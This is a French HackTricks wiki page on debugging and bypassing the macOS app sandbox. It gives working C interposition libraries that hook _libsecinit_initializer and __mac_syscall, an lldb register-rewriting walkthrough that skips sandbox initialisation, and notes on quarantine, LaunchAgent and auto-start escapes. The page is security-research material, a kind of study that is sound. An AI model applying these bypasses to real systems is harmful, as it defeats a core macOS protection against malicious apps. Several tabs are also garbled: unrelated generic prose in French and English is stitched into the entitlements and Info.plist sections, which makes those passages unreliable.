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# Débogage et Contournement du Bac à Sable macOS
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<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
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</details>
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## Processus de chargement du bac à sable
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<figure><img src="../../../../../.gitbook/assets/image (898).png" alt=""><figcaption><p>Image de <a href="http://newosxbook.com/files/HITSB.pdf">http://newosxbook.com/files/HITSB.pdf</a></p></figcaption></figure>
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Sur l'image précédente, il est possible d'observer **comment le bac à sable sera chargé** lorsqu'une application avec l'attribution **`com.apple.security.app-sandbox`** est exécutée.
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Le compilateur liera `/usr/lib/libSystem.B.dylib` au binaire.
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Ensuite, **`libSystem.B`** appellera d'autres fonctions jusqu'à ce que **`xpc_pipe_routine`** envoie les autorisations de l'application à **`securityd`**. Securityd vérifie si le processus doit être mis en quarantaine à l'intérieur du Bac à Sable, et le cas échéant, il sera mis en quarantaine.\
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Enfin, le bac à sable sera activé par un appel à **`__sandbox_ms`** qui appellera **`__mac_syscall`**.
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## Contournements Possibles
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### Contournement de l'attribut de quarantaine
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Les **fichiers créés par des processus mis en bac à sable** se voient attribuer l'**attribut de quarantaine** pour empêcher les évasions du bac à sable. Cependant, si vous parvenez à **créer un dossier `.app` sans l'attribut de quarantaine** dans une application mise en bac à sable, vous pourriez faire pointer le binaire du bundle de l'application vers **`/bin/bash`** et ajouter des variables d'environnement dans le **plist** pour abuser de **`open`** et **lancer la nouvelle application hors du bac à sable**.
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C'est ce qui a été fait dans [**CVE-2023-32364**](https://gergelykalman.com/CVE-2023-32364-a-macOS-sandbox-escape-by-mounting.html)**.**
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{% hint style="danger" %}
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Par conséquent, pour l'instant, si vous êtes simplement capable de créer un dossier portant un nom se terminant par **`.app`** sans attribut de quarantaine, vous pouvez échapper au bac à sable car macOS ne vérifie que l'attribut de **quarantaine** dans le **dossier `.app`** et dans l'**exécutable principal** (et nous allons faire pointer l'exécutable principal vers **`/bin/bash`**).
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Notez que si un bundle .app a déjà été autorisé à s'exécuter (il a un xttr de quarantaine avec le drapeau autorisé à s'exécuter), vous pourriez également en abuser... sauf que maintenant vous ne pouvez pas écrire à l'intérieur des bundles **`.app`** à moins d'avoir certaines autorisations TCC privilégiées (que vous n'aurez pas dans un bac à sable élevé).
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{% endhint %}
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### Abus de la fonctionnalité Open
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Dans les [**derniers exemples de contournement du bac à sable de Word**](macos-office-sandbox-bypasses.md#word-sandbox-bypass-via-login-items-and-.zshenv), on peut voir comment la fonctionnalité **`open`** de la ligne de commande peut être abusée pour contourner le bac à sable.
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{% content-ref url="macos-office-sandbox-bypasses.md" %}
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|
[macos-office-sandbox-bypasses.md](macos-office-sandbox-bypasses.md)
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{% endcontent-ref %}
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### Agents/Daemons de Lancement
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Même si une application est **censée être mise en bac à sable** (`com.apple.security.app-sandbox`), il est possible de contourner le bac à sable si elle est **exécutée à partir d'un LaunchAgent** (`~/Library/LaunchAgents`) par exemple.\
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Comme expliqué dans [**cet article**](https://www.vicarius.io/vsociety/posts/cve-2023-26818-sandbox-macos-tcc-bypass-w-telegram-using-dylib-injection-part-2-3?q=CVE-2023-26818), si vous souhaitez obtenir une persistance avec une application mise en bac à sable, vous pourriez la faire s'exécuter automatiquement en tant que LaunchAgent et peut-être injecter du code malveillant via des variables d'environnement DyLib.
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### Abus des Emplacements de Démarrage Automatique
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Si un processus mis en bac à sable peut **écrire** à un endroit où **plus tard une application non mise en bac à sable va exécuter le binaire**, il pourra **s'échapper simplement en plaçant** le binaire là-bas. Un bon exemple de ce type d'emplacements sont `~/Library/LaunchAgents` ou `/System/Library/LaunchDaemons`.
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Pour cela, vous pourriez même avoir besoin de **2 étapes** : Faire en sorte qu'un processus avec un **bac à sable plus permissif** (`file-read*`, `file-write*`) exécute votre code qui écrira en réalité à un endroit où il sera **exécuté sans bac à sable**.
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Consultez cette page sur les **emplacements de démarrage automatique** :
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{% content-ref url="../../../../macos-auto-start-locations.md" %}
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[macos-auto-start-locations.md](../../../../macos-auto-start-locations.md)
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{% endcontent-ref %}
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### Abus d'autres processus
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Si à partir du processus en bac à sable vous êtes capable de **compromettre d'autres processus** s'exécutant dans des bacs à sable moins restrictifs (ou aucun), vous pourrez échapper à leurs bacs à sable :
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{% content-ref url="../../../macos-proces-abuse/" %}
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[macos-proces-abuse](../../../macos-proces-abuse/)
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{% endcontent-ref %}
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### Compilation Statique & Liaison Dynamique
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[Cette recherche](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) a découvert 2 façons de contourner le Bac à Sable. Parce que le bac à sable est appliqué depuis l'espace utilisateur lorsque la bibliothèque **libSystem** est chargée. Si un binaire pouvait éviter de la charger, il ne serait jamais mis en bac à sable :
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* Si le binaire était **complètement compilé de manière statique**, il pourrait éviter de charger cette bibliothèque.
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* Si le **binaire n'avait pas besoin de charger de bibliothèques** (car le lien est également dans libSystem), il n'aurait pas besoin de charger libSystem.
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### Shellcodes
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Notez que **même les shellcodes** en ARM64 doivent être liés dans `libSystem.dylib`:
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```bash
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ld -o shell shell.o -macosx_version_min 13.0
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ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64
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```
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### Autorisations
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Notez que même si certaines **actions** peuvent être **autorisées par le sandbox** si une application a une **autorisation** spécifique, comme dans :
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```scheme
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(when (entitlement "com.apple.security.network.client")
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(allow network-outbound (remote ip))
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(allow mach-lookup
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(global-name "com.apple.airportd")
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(global-name "com.apple.cfnetwork.AuthBrokerAgent")
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(global-name "com.apple.cfnetwork.cfnetworkagent")
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|
[...]
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```
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### Contournement de l'interposition
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Pour plus d'informations sur l'**interposition**, consultez :
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{% content-ref url="../../../macos-proces-abuse/macos-function-hooking.md" %}
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|
[macos-function-hooking.md](../../../macos-proces-abuse/macos-function-hooking.md)
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|
{% endcontent-ref %}
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#### Interposer `_libsecinit_initializer` pour éviter le bac à sable
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```c
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// gcc -dynamiclib interpose.c -o interpose.dylib
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|
#include <stdio.h>
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void _libsecinit_initializer(void);
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void overriden__libsecinit_initializer(void) {
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printf("_libsecinit_initializer called\n");
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}
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__attribute__((used, section("__DATA,__interpose"))) static struct {
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void (*overriden__libsecinit_initializer)(void);
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void (*_libsecinit_initializer)(void);
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|
}
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|
_libsecinit_initializer_interpose = {overriden__libsecinit_initializer, _libsecinit_initializer};
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```
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|
```bash
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DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
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|
_libsecinit_initializer called
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Sandbox Bypassed!
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```
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#### Interposer `__mac_syscall` pour empêcher le bac à sable
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{% code title="interpose.c" %}
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```c
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// gcc -dynamiclib interpose.c -o interpose.dylib
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|
#include <stdio.h>
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#include <string.h>
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// Forward Declaration
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int __mac_syscall(const char *_policyname, int _call, void *_arg);
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// Replacement function
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int my_mac_syscall(const char *_policyname, int _call, void *_arg) {
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printf("__mac_syscall invoked. Policy: %s, Call: %d\n", _policyname, _call);
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|
if (strcmp(_policyname, "Sandbox") == 0 && _call == 0) {
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|
printf("Bypassing Sandbox initiation.\n");
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return 0; // pretend we did the job without actually calling __mac_syscall
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|
}
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// Call the original function for other cases
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|
return __mac_syscall(_policyname, _call, _arg);
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|
}
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// Interpose Definition
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struct interpose_sym {
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const void *replacement;
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const void *original;
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};
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// Interpose __mac_syscall with my_mac_syscall
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__attribute__((used)) static const struct interpose_sym interposers[] __attribute__((section("__DATA, __interpose"))) = {
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|
{ (const void *)my_mac_syscall, (const void *)__mac_syscall },
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|
};
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|
```
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{% endcode %}
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```bash
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|
DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
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|
__mac_syscall invoked. Policy: Sandbox, Call: 2
|
|
__mac_syscall invoked. Policy: Sandbox, Call: 2
|
|
__mac_syscall invoked. Policy: Sandbox, Call: 0
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|
Bypassing Sandbox initiation.
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__mac_syscall invoked. Policy: Quarantine, Call: 87
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|
__mac_syscall invoked. Policy: Sandbox, Call: 4
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|
Sandbox Bypassed!
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```
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### Déboguer et contourner le bac à sable avec lldb
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Compilons une application qui devrait être sandboxée :
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{% tabs %}
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{% tab title="sand.c" %}
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```c
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#include <stdlib.h>
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int main() {
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system("cat ~/Desktop/del.txt");
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}
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```
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{% endtab %}
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{% tab title="entitlements.xml" %}
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### macOS Sandbox Débogage et Contournement
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Lors de l'analyse des applications macOS, il est souvent nécessaire de contourner les restrictions du bac à sable pour effectuer des tests de sécurité approfondis. Voici quelques techniques courantes pour déboguer et contourner le bac à sable macOS :
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1. **Injection de Code** : Utiliser des outils tels que Frida pour injecter du code dans le processus de l'application et contourner les restrictions du bac à sable.
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2. **Contournement des Restrictions** : Identifier et exploiter les vulnérabilités dans le bac à sable pour échapper aux limitations imposées.
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3. **Analyse Dynamique** : Utiliser des outils d'analyse dynamique comme LLDB pour inspecter et manipuler le comportement de l'application en cours d'exécution.
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En comprenant ces techniques, les chercheurs en sécurité peuvent mieux évaluer la résilience des applications macOS face aux attaques de contournement du bac à sable.
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{% endtab %}
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```xml
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<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0">
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<dict>
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<key>com.apple.security.app-sandbox</key>
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<true/>
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</dict>
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</plist>
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```
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{% endtab %}
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{% tab title="Info.plist" %}
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## macOS Sandbox Debug and Bypass
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### Debugging the macOS Sandbox
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To debug the macOS sandbox, you can use the `sandbox-exec` tool with the `-D` flag to enable debug mode. This will print detailed information about the sandbox operations to the console, helping you understand how the sandbox is restricting your application.
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```bash
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sandbox-exec -D
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```
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### Bypassing the macOS Sandbox
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To bypass the macOS sandbox, you can use various techniques such as exploiting vulnerabilities in the sandbox profile, injecting code into a process with sandbox access, or using kernel vulnerabilities to disable sandbox restrictions.
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It's important to note that bypassing the macOS sandbox is a serious security risk and should only be done for research or testing purposes in controlled environments.
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```xml
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<plist version="1.0">
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<dict>
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<key>CFBundleIdentifier</key>
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<string>xyz.hacktricks.sandbox</string>
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<key>CFBundleName</key>
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<string>Sandbox</string>
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</dict>
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</plist>
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```
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{% endtab %}
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{% endtabs %}
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Ensuite, compilez l'application :
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{% code overflow="wrap" %}
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```bash
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# Compile it
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gcc -Xlinker -sectcreate -Xlinker __TEXT -Xlinker __info_plist -Xlinker Info.plist sand.c -o sand
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# Create a certificate for "Code Signing"
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# Apply the entitlements via signing
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codesign -s <cert-name> --entitlements entitlements.xml sand
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```
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{% endcode %}
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{% hint style="danger" %}
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L'application va essayer de **lire** le fichier **`~/Desktop/del.txt`**, que le **bac à sable n'autorisera pas**.\
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Créez un fichier à cet emplacement car une fois que le bac à sable est contourné, il pourra le lire :
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```bash
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echo "Sandbox Bypassed" > ~/Desktop/del.txt
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```
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{% endhint %}
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Déboguons l'application pour voir quand le Bac à sable est chargé :
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```bash
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# Load app in debugging
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lldb ./sand
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# Set breakpoint in xpc_pipe_routine
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(lldb) b xpc_pipe_routine
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# run
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(lldb) r
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# This breakpoint is reached by different functionalities
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# Check in the backtrace is it was de sandbox one the one that reached it
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# We are looking for the one libsecinit from libSystem.B, like the following one:
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(lldb) bt
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* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
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* frame #0: 0x00000001873d4178 libxpc.dylib`xpc_pipe_routine
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frame #1: 0x000000019300cf80 libsystem_secinit.dylib`_libsecinit_appsandbox + 584
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frame #2: 0x00000001874199c4 libsystem_trace.dylib`_os_activity_initiate_impl + 64
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frame #3: 0x000000019300cce4 libsystem_secinit.dylib`_libsecinit_initializer + 80
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frame #4: 0x0000000193023694 libSystem.B.dylib`libSystem_initializer + 272
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# To avoid lldb cutting info
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(lldb) settings set target.max-string-summary-length 10000
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# The message is in the 2 arg of the xpc_pipe_routine function, get it with:
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(lldb) p (char *) xpc_copy_description($x1)
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(char *) $0 = 0x000000010100a400 "<dictionary: 0x6000026001e0> { count = 5, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REGISTRATION_MESSAGE_SHORT_NAME_KEY\" => <string: 0x600000c00d80> { length = 4, contents = \"sand\" }\n\t\"SECINITD_REGISTRATION_MESSAGE_IMAGE_PATHS_ARRAY_KEY\" => <array: 0x600000c00120> { count = 42, capacity = 64, contents =\n\t\t0: <string: 0x600000c000c0> { length = 14, contents = \"/tmp/lala/sand\" }\n\t\t1: <string: 0x600000c001e0> { length = 22, contents = \"/private/tmp/lala/sand\" }\n\t\t2: <string: 0x600000c000f0> { length = 26, contents = \"/usr/lib/libSystem.B.dylib\" }\n\t\t3: <string: 0x600000c00180> { length = 30, contents = \"/usr/lib/system/libcache.dylib\" }\n\t\t4: <string: 0x600000c00060> { length = 37, contents = \"/usr/lib/system/libcommonCrypto.dylib\" }\n\t\t5: <string: 0x600000c001b0> { length = 36, contents = \"/usr/lib/system/libcompiler_rt.dylib\" }\n\t\t6: <string: 0x600000c00330> { length = 33, contents = \"/usr/lib/system/libcopyfile.dylib\" }\n\t\t7: <string: 0x600000c00210> { length = 35, contents = \"/usr/lib/system/libcorecry"...
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# The 3 arg is the address were the XPC response will be stored
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(lldb) register read x2
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x2 = 0x000000016fdfd660
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# Move until the end of the function
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(lldb) finish
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# Read the response
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## Check the address of the sandbox container in SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY
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(lldb) memory read -f p 0x000000016fdfd660 -c 1
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0x16fdfd660: 0x0000600003d04000
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(lldb) p (char *) xpc_copy_description(0x0000600003d04000)
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(char *) $4 = 0x0000000100204280 "<dictionary: 0x600003d04000> { count = 7, transaction: 0, voucher = 0x0, contents =\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ID_KEY\" => <string: 0x600000c04d50> { length = 22, contents = \"xyz.hacktricks.sandbox\" }\n\t\"SECINITD_REPLY_MESSAGE_QTN_PROC_FLAGS_KEY\" => <uint64: 0xaabe660cef067137>: 2\n\t\"SECINITD_REPLY_MESSAGE_CONTAINER_ROOT_PATH_KEY\" => <string: 0x600000c04e10> { length = 65, contents = \"/Users/carlospolop/Library/Containers/xyz.hacktricks.sandbox/Data\" }\n\t\"SECINITD_REPLY_MESSAGE_SANDBOX_PROFILE_DATA_KEY\" => <data: 0x600001704100>: { length = 19027 bytes, contents = 0x0000f000ba0100000000070000001e00350167034d03c203... }\n\t\"SECINITD_REPLY_MESSAGE_VERSION_NUMBER_KEY\" => <int64: 0xaa3e660cef06712f>: 1\n\t\"SECINITD_MESSAGE_TYPE_KEY\" => <uint64: 0xaabe660cef067137>: 2\n\t\"SECINITD_REPLY_FAILURE_CODE\" => <uint64: 0xaabe660cef067127>: 0\n}"
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# To bypass the sandbox we need to skip the call to __mac_syscall
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# Lets put a breakpoint in __mac_syscall when x1 is 0 (this is the code to enable the sandbox)
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(lldb) breakpoint set --name __mac_syscall --condition '($x1 == 0)'
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(lldb) c
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# The 1 arg is the name of the policy, in this case "Sandbox"
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(lldb) memory read -f s $x0
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0x19300eb22: "Sandbox"
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#
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# BYPASS
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#
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# Due to the previous bp, the process will be stopped in:
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Process 2517 stopped
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* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1
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frame #0: 0x0000000187659900 libsystem_kernel.dylib`__mac_syscall
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libsystem_kernel.dylib`:
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-> 0x187659900 <+0>: mov x16, #0x17d
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0x187659904 <+4>: svc #0x80
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0x187659908 <+8>: b.lo 0x187659928 ; <+40>
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0x18765990c <+12>: pacibsp
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# To bypass jump to the b.lo address modifying some registers first
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(lldb) breakpoint delete 1 # Remove bp
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(lldb) register write $pc 0x187659928 #b.lo address
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|
(lldb) register write $x0 0x00
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(lldb) register write $x1 0x00
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(lldb) register write $x16 0x17d
|
|
(lldb) c
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|
Process 2517 resuming
|
|
Sandbox Bypassed!
|
|
Process 2517 exited with status = 0 (0x00000000)
|
|
```
|
|
{% hint style="warning" %}
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**Même avec le contournement du bac à sable, TCC** demandera à l'utilisateur s'il souhaite autoriser le processus à lire des fichiers depuis le bureau.
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## Références
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* [http://newosxbook.com/files/HITSB.pdf](http://newosxbook.com/files/HITSB.pdf)
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* [https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/)
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* [https://www.youtube.com/watch?v=mG715HcDgO8](https://www.youtube.com/watch?v=mG715HcDgO8)
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<summary><strong>Apprenez le piratage AWS de zéro à héros avec</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Expert en équipe rouge AWS de HackTricks)</strong></a><strong>!</strong></summary>
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Autres façons de soutenir HackTricks:
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